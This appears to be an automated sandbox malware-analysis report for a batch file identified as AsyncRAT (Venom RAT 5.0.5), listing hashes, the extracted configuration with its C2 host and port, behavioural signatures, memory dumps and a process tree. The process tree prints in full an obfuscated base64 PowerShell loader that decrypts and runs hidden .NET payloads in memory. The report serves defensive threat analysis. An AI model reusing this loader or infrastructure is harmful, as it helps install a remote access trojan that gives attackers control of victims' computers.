asyncrat | 43feb4c81e9e5be7b22c542dd0d54725075a67dbf592bb65b3b625c04256af55

General

Target

update.cmd
Size

60KB
MD5

55db0ea580cce204785f5537cbabf05b
SHA1

d2f423c3416532ef91b74b50c5cb746829f3d114
SHA256

43feb4c81e9e5be7b22c542dd0d54725075a67dbf592bb65b3b625c04256af55
SHA512

c12463cc06def3a872f904e44378145a39c72659961ed48156b083440041d4662a454c5737fd0fa45199e659ba62a90029c3800a94526895b43ac3ac0d430480
SSDEEP

1536:9TpJ48aohXl/LnI5BDLfj+OMfh3BRc8z4lJm5DQ3Vve:Jr4In7I5BDLfKf8+DYg

Score

10^/10

asyncrat venom clients rat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

mkys.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral4/memory/2816-33-0x0000020062500000-0x0000020062516000-memory.dmp	family_asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

2 2816 powershell.exe
4 2816 powershell.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

2816 powershell.exe
2816 powershell.exe
648 powershell.exe
648 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2816 powershell.exe
Token: SeDebugPrivilege 648 powershell.exe

flow	pid	process
2	2816	powershell.exe
4	2816	powershell.exe

pid	process
2816	powershell.exe
2816	powershell.exe
648	powershell.exe
648	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	648	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.execmd.exepowershell.exe

description	pid	process	target process
PID 4092 wrote to memory of 3584	4092	cmd.exe	cmd.exe
PID 4092 wrote to memory of 3584	4092	cmd.exe	cmd.exe
PID 4092 wrote to memory of 1740	4092	cmd.exe	cmd.exe
PID 4092 wrote to memory of 1740	4092	cmd.exe	cmd.exe
PID 1740 wrote to memory of 3672	1740	cmd.exe	cmd.exe
PID 1740 wrote to memory of 3672	1740	cmd.exe	cmd.exe
PID 1740 wrote to memory of 2788	1740	cmd.exe	cmd.exe
PID 1740 wrote to memory of 2788	1740	cmd.exe	cmd.exe
PID 1740 wrote to memory of 2816	1740	cmd.exe	powershell.exe
PID 1740 wrote to memory of 2816	1740	cmd.exe	powershell.exe
PID 2816 wrote to memory of 648	2816	powershell.exe	powershell.exe
PID 2816 wrote to memory of 648	2816	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\update.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:3584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\update.cmd
2⤵
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
3⤵
PID:3672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\update.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gTmpxc2koJGFGRGxFKXskRlVRT209W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JEZVUU9tLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskRlVRT20uUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRGVVFPbS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnQUhUZE9FL3hjdmdJSHFUajZEOGhsZStsMTdONklWWTVzOVlhSjE4WmpPWT0nKTskRlVRT20uSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZ0Q5RS9pL2x6Wk1NMXgrQWtTUVdTQT09Jyk7JGZUdURqPSRGVVFPbS5DcmVhdGVEZWNyeXB0b3IoKTskY2NVVko9JGZUdURqLlRyYW5zZm9ybUZpbmFsQmxvY2soJGFGRGxFLDAsJGFGRGxFLkxlbmd0aCk7JGZUdURqLkRpc3Bvc2UoKTskRlVRT20uRGlzcG9zZSgpOyRjY1VWSjt9ZnVuY3Rpb24ga1FoZWsoJGFGRGxFKXska2ZtWmc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkYUZEbEUpOyRpV212WD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JHdSd2RrPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJGtmbVpnLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskd1J3ZGsuQ29weVRvKCRpV212WCk7JHdSd2RrLkRpc3Bvc2UoKTska2ZtWmcuRGlzcG9zZSgpOyRpV212WC5EaXNwb3NlKCk7JGlXbXZYLlRvQXJyYXkoKTt9JG1KZ3ViPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskdFBTeEY9a1FoZWsgKE5qcXNpIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJG1KZ3ViLCA1KS5TdWJzdHJpbmcoMikpKSk7JHlTZ2taPWtRaGVrIChOanFzaSAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRtSmd1YiwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0keVNna1opLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJHRQU3hGKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
3⤵
PID:2788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:648

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nboh0ree.ps3.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/648-14-0x00007FFCD1630000-0x00007FFCD20F2000-memory.dmp

Filesize
10.8MB

Download
memory/648-27-0x00007FFCD1630000-0x00007FFCD20F2000-memory.dmp

Filesize
10.8MB

Download
memory/648-21-0x0000028668A70000-0x0000028668A80000-memory.dmp

Filesize
64KB

Download
memory/648-20-0x0000028668A70000-0x0000028668A80000-memory.dmp

Filesize
64KB

Download
memory/2816-30-0x00007FFCF26E0000-0x00007FFCF28E9000-memory.dmp

Filesize
2.0MB

Download
memory/2816-32-0x0000020062C10000-0x0000020062C20000-memory.dmp

Filesize
64KB

Download
memory/2816-12-0x00000200622E0000-0x00000200622F0000-memory.dmp

Filesize
64KB

Download
memory/2816-11-0x00000200622E0000-0x00000200622F0000-memory.dmp

Filesize
64KB

Download
memory/2816-10-0x00000200622E0000-0x00000200622F0000-memory.dmp

Filesize
64KB

Download
memory/2816-8-0x0000020062450000-0x0000020062472000-memory.dmp

Filesize
136KB

Download
memory/2816-28-0x00000200624F0000-0x00000200624FA000-memory.dmp

Filesize
40KB

Download
memory/2816-9-0x00007FFCD1630000-0x00007FFCD20F2000-memory.dmp

Filesize
10.8MB

Download
memory/2816-31-0x00007FFCF06A0000-0x00007FFCF075D000-memory.dmp

Filesize
756KB

Download
memory/2816-13-0x0000020062510000-0x0000020062556000-memory.dmp

Filesize
280KB

Download
memory/2816-33-0x0000020062500000-0x0000020062516000-memory.dmp

Filesize
88KB

Download
memory/2816-34-0x00007FFCF26E0000-0x00007FFCF28E9000-memory.dmp

Filesize
2.0MB

Download
memory/2816-38-0x0000020063370000-0x00000200633A3000-memory.dmp

Filesize
204KB

Download
memory/2816-37-0x0000020062BD0000-0x0000020062BF6000-memory.dmp

Filesize
152KB

Download
memory/2816-39-0x00007FFCD1630000-0x00007FFCD20F2000-memory.dmp

Filesize
10.8MB

Download
memory/2816-41-0x00000200622E0000-0x00000200622F0000-memory.dmp

Filesize
64KB

Download
memory/2816-42-0x00000200622E0000-0x00000200622F0000-memory.dmp

Filesize
64KB

Download
memory/2816-45-0x00007FFCF26E0000-0x00007FFCF28E9000-memory.dmp

Filesize
2.0MB

Download
memory/2816-46-0x00007FFCF26E0000-0x00007FFCF28E9000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing